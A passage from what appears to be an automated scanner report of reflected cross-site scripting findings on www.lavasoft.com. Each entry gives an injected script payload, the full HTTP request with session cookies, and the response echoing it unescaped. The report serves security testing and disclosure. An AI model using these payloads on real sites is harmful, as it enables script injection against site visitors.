<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sitesf4f27'><script>alert(1)</script>30edce3703c/all/modules/cck/modules/filefield/filefield.css'>
...[SNIP]...

1.228. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d427b'><script>alert(1)</script>df1388f24cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/alld427b'><script>alert(1)</script>df1388f24cc/modules/cck/modules/filefield/filefield.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/alld427b'><script>alert(1)</script>df1388f24cc/modules/cck/modules/filefield/filefield.css'>
...[SNIP]...

1.229. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f9f67'><script>alert(1)</script>c9c54c00294 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modulesf9f67'><script>alert(1)</script>c9c54c00294/cck/modules/filefield/filefield.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modulesf9f67'><script>alert(1)</script>c9c54c00294/cck/modules/filefield/filefield.css'>
...[SNIP]...

1.230. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3443b'><script>alert(1)</script>0d75aba846e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck3443b'><script>alert(1)</script>0d75aba846e/modules/filefield/filefield.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck3443b'><script>alert(1)</script>0d75aba846e/modules/filefield/filefield.css'>
...[SNIP]...

1.231. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2bc2c'><script>alert(1)</script>aa458b12de5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/modules2bc2c'><script>alert(1)</script>aa458b12de5/filefield/filefield.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/modules2bc2c'><script>alert(1)</script>aa458b12de5/filefield/filefield.css'>
...[SNIP]...

1.232. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dc7bf'><script>alert(1)</script>385b89604bb was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/modules/filefielddc7bf'><script>alert(1)</script>385b89604bb/filefield.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/modules/filefielddc7bf'><script>alert(1)</script>385b89604bb/filefield.css'>
...[SNIP]...

1.233. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6771b'><script>alert(1)</script>d3895153ec4 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css6771b'><script>alert(1)</script>d3895153ec4?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cck/modules/filefield/filefield.css6771b'><script>alert(1)</script>d3895153ec4'>
...[SNIP]...

1.234. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/theme/content-module.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86b10'><script>alert(1)</script>64da57a4779 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft86b10'><script>alert(1)</script>64da57a4779/sites/all/modules/cck/theme/content-module.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:24 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:24 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10650
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft86b10'><script>alert(1)</script>64da57a4779/sites/all/modules/cck/theme/content-module.css?w'>
...[SNIP]...

1.235. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/theme/content-module.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7359e'><script>alert(1)</script>46e6790cd1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites7359e'><script>alert(1)</script>46e6790cd1d/all/modules/cck/theme/content-module.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18274
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites7359e'><script>alert(1)</script>46e6790cd1d/all/modules/cck/theme/content-module.css'>
...[SNIP]...

1.236. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/theme/content-module.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 40d14'><script>alert(1)</script>a7a3b400c0b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all40d14'><script>alert(1)</script>a7a3b400c0b/modules/cck/theme/content-module.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18236
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all40d14'><script>alert(1)</script>a7a3b400c0b/modules/cck/theme/content-module.css'>
...[SNIP]...

1.237. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/theme/content-module.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2af3b'><script>alert(1)</script>983fadd018c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules2af3b'><script>alert(1)</script>983fadd018c/cck/theme/content-module.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18236
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules2af3b'><script>alert(1)</script>983fadd018c/cck/theme/content-module.css'>
...[SNIP]...

1.238. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/theme/content-module.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da6b2'><script>alert(1)</script>50d9790c04d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cckda6b2'><script>alert(1)</script>50d9790c04d/theme/content-module.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18236
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/cckda6b2'><script>alert(1)</script>50d9790c04d/theme/content-module.css'>
...[SNIP]...

1.239. http://www.lavasoft.com/mylavasoft/sites/all/modules/cck/theme/content-module.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9aea8'><script>alert(1)</script>4cffde98153 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/cck/theme9aea8'><script>alert(1)</script>4cffde98153/content-module.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
